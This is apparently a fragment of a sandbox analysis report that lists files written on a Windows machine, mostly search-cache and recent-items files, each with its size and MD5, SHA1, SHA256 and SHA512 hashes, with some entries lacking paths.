SHA51263efcb12a946429ee331f7f121e1a2227ad9269bb0d408572b6cb79a0b1704a43a5b09c62438c65ea8e858024102e2c8b3e022c53c3fe4412f48f3b0ef93bd3b
-
C:\Users\Admin\AppData\Local\Packages\microsoft.windows.search_cw5n1h2txyewy\AC\Microsoft\Internet Explorer\DOMStore\W3Y3NP6R\microsoft.windows[1].xml
Filesize1KB
MD55b95b04c3870d0badf5fc92923ce5509
SHA1930287ce8ee49d6a455aa613c66c1e95797b60ae
SHA2560f7fc42681563cc57333c36748947dd1041e6b19de9e416919e48578f8ba9016
SHA5129d6ff768fc5f97aae864532de71760c0ab5fb6d3a094a75b7480dbc41c204a8f39738f03010a0efbf84f158443887bc9e83b130dbbb43dd12c15e9a6a472d92b
-
Filesize
75B
MD588588772a8ae25a467390f0c89b281e8
SHA13e0ecf4b0dee70b45f5090918ce3cfe63ddb8ef8
SHA25640707b3bb21408fe71710b0ced97d3bee5deb4cb858b7167d28aeecbeefa47b4
SHA512af0627292b040afee5da01e48cc979ae6df3afaf15bb27befd9978599c3345f3873f409224a0556e939661d3e37a1eafa9b6737afa00cfe5dc6e7a93a7dbc3bf
-
Filesize
47B
MD5510673acb174f67a52d761324580a0d0
SHA1d2b22130619f82d822777862336fb756bf77ffc7
SHA2567dbdd9e6d5d34dc8766e7a3aa09260f3a3c20e65b45189d9d9de58bc92033e20
SHA51285904f6e604a95016a2e787228d8a844e5192e7ed1bf2418e1f7d75822ac3e37d95d8eedb66f74c5930c726133971e2ffdb28151519a0a26592f1b46abebdb0f
-
Filesize
1KB
MD5dc9c3ac308a3cfbd8988083c62575b3c
SHA1c7f4627e425afd6f0f5a69ba0da9433c8cffdb31
SHA256e2432d38babdbfdae24b33c83af99082019fd559b28d9eb67a984a1308d8f63c
SHA5123dfecaf15c816970ed0f88b1d27abdf7634cc0653538e3a44e19a0d715261ed55f5eec3e8b318f7c8a63022eda3686a038813860a4a2eeeb7cb971938fde8d8f
-
Filesize
2B
MD5f3b25701fe362ec84616a93a45ce9998
SHA1d62636d8caec13f04e28442a0a6fa1afeb024bbb
SHA256b3d510ef04275ca8e698e5b3cbb0ece3949ef9252f0cdc839e9ee347409a2209
SHA51298c5f56f3de340690c139e58eb7dac111979f0d4dffe9c4b24ff849510f4b6ffa9fd608c0a3de9ac3c9fd2190f0efaf715309061490f9755a9bfdf1c54ca0d84
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ccba5a5986c77e43.customDestinations-ms
Filesize3KB
MD5fbed453467cd6f22805eec08ae293b6a
SHA185ab5e6a5d0249e3bf1d4a1b66b44c2b7cac82d4
SHA2565c6d503f108fcea97154a4fb3a0a8b404e14f68eff3c0e3e8e371625a55c5142
SHA5123a7cf8b7cc405bfcd997f517dbc229d3149da599ac35074eb411f22d06cac58489b84f2a5c0ec3bd9c82c7f180ddcd060e02ae544babe2a0725f81af045ada5a
-
Filesize
101B
MD5f16fb6850c239ec1854cffc1ba29444f
SHA130fe6bbb61e779482041d37a9ee9a69cf9602154
SHA256934c7158c85df97a1b7829fad5fbe67271d4345315f5a08c489725f7b592ac5c
SHA512a4fe7cd2c11a90cb0b1d45c4d4b88e79601235ccac9913bc565550b9ab6dec30fc9908db3ffb4ba28a0d06064024d3deea67caa41ee53d1876a209893433bdf2